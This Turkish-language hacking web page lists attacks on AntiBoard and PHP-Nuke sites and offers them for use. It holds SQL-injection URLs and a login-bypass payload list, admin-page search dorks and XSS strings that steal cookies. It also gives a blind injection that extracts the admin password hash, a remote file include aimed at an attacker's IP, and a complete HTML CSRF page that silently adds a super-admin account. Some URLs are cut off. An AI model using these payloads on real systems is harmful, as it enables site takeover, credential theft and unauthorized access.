Banner için tıkla

sagopakoleracilar

siteaciklari

Bazı web site açıkları:

Çok basit bir sistem içinde birçok sql injection ve cross-site scripting açıkları var.

/antiboard.php?thread_id=1%20UNION%20ALL%20select%2 0field%20from%20whatever--&mode=threaded&sort_order=
/antiboard.php?range=all&mode=threaded&thread_id=1&reply=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--
/antiboard.php?range=all&thread_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&sort_order=ASC&mode=threaded
/antiboard.php?thread_id=1&parent_id=1%20UNION%20ALL%20select%20field%20from% 20whatever--&mode=nested&reply=1






Admin login page:
Code:
admin/login.asp
admin/
login.asp
admin.asp


Dork for find admin area:
Code:
inurl:login.asp
index of:/admin/login.asp

i used this code to hack :- ' or '1'='1


Injection type:
Code:
user:admin (what ever you want)
pass:' or 1=1--


Code:
user:' or 1=1--
admin:' or 1=1--


Others:

Code:
'
'or''='
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a


XSS attack : http://../antiboard.php?thread_id=1&mode=threaded&range=&feedback=< script>alert(document.cookie);</script>



SQL Injection açığı

http://www.siteadı.com/modules.php?...xLG51b GwvKjox

------------------------------------------------
SQL Injection açığı 2

http://www.siteadı.com/modules.php?...0nu ke_authors

-----------------------------------------------
SQL Injection açığı 3

http://www.siteadı.com/modules.php?...%20nuk e_users

-------------------------------------------------
SQL Injection açığı 4

http://www.siteadı.com/modules.php?...OM%20nuke_users





Bu yöntem çok eski bir yöntem ama verdiğim açıklar 2004 yılına uygundur bazı siteler için.


Kod:
http://www.siteninadı.com/phpnukeyo...=f00&score=9999




Kod:
http://www.siteninadı.com/phpnuke yolu/modules.php?name=Reviews&rop=savecomment&id=1&uname=f00bar&score=999999999999999999999999




sistemden cookie çalma bu yolla admin gibi login olabilirsiniz yada md5 hash ini crackliyebilirsiniz




Kod:
http://www.siteninadı.com/phpnukeyolu/modules.php?name=Reviews&rop=postcomment&id='&title=a




bu kod çalışmazsa geri tuşuna basın bidaha ileri tuşuna basın karşınıza admin id si ile md5 hash i gelicektir

admin.php yoluna ulaşmak



Kod:
http://www.siteninadı.com/phpnukeyo...php?op=FaqCatGo
http://www.siteninadı.com/phpnukeyo...n.php/index.php
http://www.siteninadı.com/phpnukeyo...s.php/admin.php



bu tehlikeli açıklardan biridir phpnuke portalına belirlediğinz dosyalar eklenir adam girdiğinde o dosya yada kod bilgisayarınıza iner oto çalıştırılabilir



Kod:
http://www.siteninadı.com/phpnukeyo...iniz.com/dizin/
http://www.siteninadı.com/phpnukeyo...h=//saldırganın ip si/bilgisayardaki klasörün adı/



cross site scripting le önemli bilgilere ulaşmak cookie hash vs.vs


Kod:
http://wwwsiteninadı.com/nukeyolu/m...e=thread&order=[xss
code here]&thold=0
http://www.siteninadı.com/nukeyolu/...d&order=&thold=[xss
code here]
http://www.siteninadı.com/nukeyolu/index.php?foo=bar%20union%20select%20<script>alert(document.cookie);</script>
http://www.siteninadı.com/nukeyolu/...d=1&show=foobar




modules.php yardımıyla siteden bilgi çalma yönetim paneline login vs.vs


Kod:
http://www.siteninadı.com/nukeyolu/...HERE/**/radmins
uper=1/**/LIMIT/**/1/*



cookie ayıklama kodundaki hatadan kaynaklanaan sitede herhangi bir script çalıştırılması yada istenilen kişinin cookie aracılıyla hash inin bulunması


Kod:
http://siteninadı.com/nukeyolu/inde...pcHQ%2bZm9vYmFy



sql injection açığı
database modifiye edilmeye olanak verir admin eklenebilir ve önemli bilgilere ulaşılabilir hash özel mesja yoluyla alınır





Kod:
http://www.siteninadı.com/nukeyolu/...xLG51b GwvKjox



admin oluşturma



Kod:
http://www.siteninadı.com/nukeyolu/...0VMRUNUIDEvKjox


kullanıcı adı dropby23 şifre 12345 olur

image tagların arasına eklenicek kodla admin eklenmesi [.img]kod[./img] gibi



Kod:
http://www.example.com/admin.php?op...d_radminsuper=1



kullanııc adı dropby23 şifre 12345 olur
img taglarla belirlenmiş kod admin tarafından okunduğunda god admin olursunuz ve silinemezsiniz

search engine açığı md5 e ulaşmak
devamı extradan


Kod:
http://www.siteninadı.com/nukeyolu/search?q=Maty+Scripts%27UNION SELECT pwd from nuke_authors where name%3d%27God%27 AND IF(mid(pwd,1,1)%3d3,benchmark(150000,md5(1337)),1) /*"

error.php açığı devamlı hata vermesini sağlar sitenin

[code]http://www.siteninadı.com/phpyolu/error.php?newlang=dropby23

yukardaki kodla etkilenmiş siteyi aşağıdaki kodla bi index.hrm hazırlayın ve sadece ona tıklamanız yeterli adminsiniz
Kod:

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor="#000000" text="#FFFFFF">
<br><br><br>
<center>

<FORM action="http://www.sitebibadı.com/error.php" method="POST">

<input type="hidden" name="error" value="<img width='0' height='0' border='0'
src='http://www.victim.com/admin.php?op=AddAuthor&add_aid=dropby23&add_name=God&add_pwd=12345&add_email=kala@hot.ee&add_radminsuper=1'></img>404">
<input type="submit" value="Attack">

</FORM>

hata sayfası olarak bu kodu hazırlayın inde.htm ve adminin görmesini sağlayın ve adminsiniz
kullanıcı adı dropby23 şifre 12345

</center>
<br><br><br>

</BODY>
</HTML>

http://academic.evergreen.edu/projects/biophysics/technotes/program/batch.htm


Bugün 23 ziyaretçi burdaydı!


Bu web sitesi ücretsiz olarak Bedava-Sitem.com ile oluşturulmuştur. Siz de kendi web sitenizi kurmak ister misiniz?
Ücretsiz kaydol